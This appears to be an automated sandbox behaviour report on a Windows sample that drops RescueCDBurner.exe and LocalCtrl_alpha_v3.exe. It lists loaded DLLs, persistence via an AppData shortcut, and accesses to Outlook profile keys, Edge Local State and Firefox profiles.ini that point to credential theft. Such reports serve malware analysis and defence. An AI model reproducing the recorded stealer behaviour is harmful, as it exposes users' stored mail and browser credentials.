Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32

Jump to behavior

Source: kkmrbb.5.dr

LNK file: ..\..\Roaming\TaskManage\RescueCDBurner.exe

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 24EPV9vjc5.exe

Static file information: File size 15692672 > 1048576

Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe

File opened: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcr100.dll

Jump to behavior

Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 24EPV9vjc5.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 24EPV9vjc5.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 24EPV9vjc5.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: 24EPV9vjc5.exe, 00000000.00000000.1315066949.000000000010B000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmp, 24EPV9vjc5.exe, 00000002.00000000.1321845292.000000000069B000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2104728893.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2104728893.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2103048434.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1370879625.000000000A0EB000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1371114350.000000000A440000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1431480802.000000000A9EC000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1431261952.000000000A630000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1431073707.000000000A2DA000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1708127369.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707128454.0000000004C87000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2662963611.00000000048F3000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2664766472.00000000058F1000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2665252992.0000000005CF4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2663375184.0000000004CF7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1370879625.000000000A0EB000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1371114350.000000000A440000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1431480802.000000000A9EC000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1431261952.000000000A630000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1431073707.000000000A2DA000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1708127369.0000000005560000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707128454.0000000004C87000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2104728893.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2104728893.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2275613143.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2347407496.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: rod.pdb\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2103048434.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: fC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ocal Statetan source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2103048434.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1432838107.000000006B371000.00000020.00000001.01000000.00000016.sdmp
Source:	Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1432620108.000000006B2B1000.00000020.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2103048434.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.iniIN source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2370247465.00000000080D4000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2662963611.00000000048F3000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2664766472.00000000058F1000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2665252992.0000000005CF4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2663375184.0000000004CF7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbL source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2104728893.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2103048434.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2370247465.00000000080D4000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: AC:\Users\user\AppData\Local\Microsoft\Edge\User Data\rod.pdb\Local StateD source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2103048434.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2F5 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2104728893.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbta\Local\Tempt2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2104728893.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb5825923st source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2104728893.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2370247465.00000000080D4000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1373593340.000000006D1F1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1435300555.000000006C011000.00000020.00000001.01000000.00000011.sdmp

Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
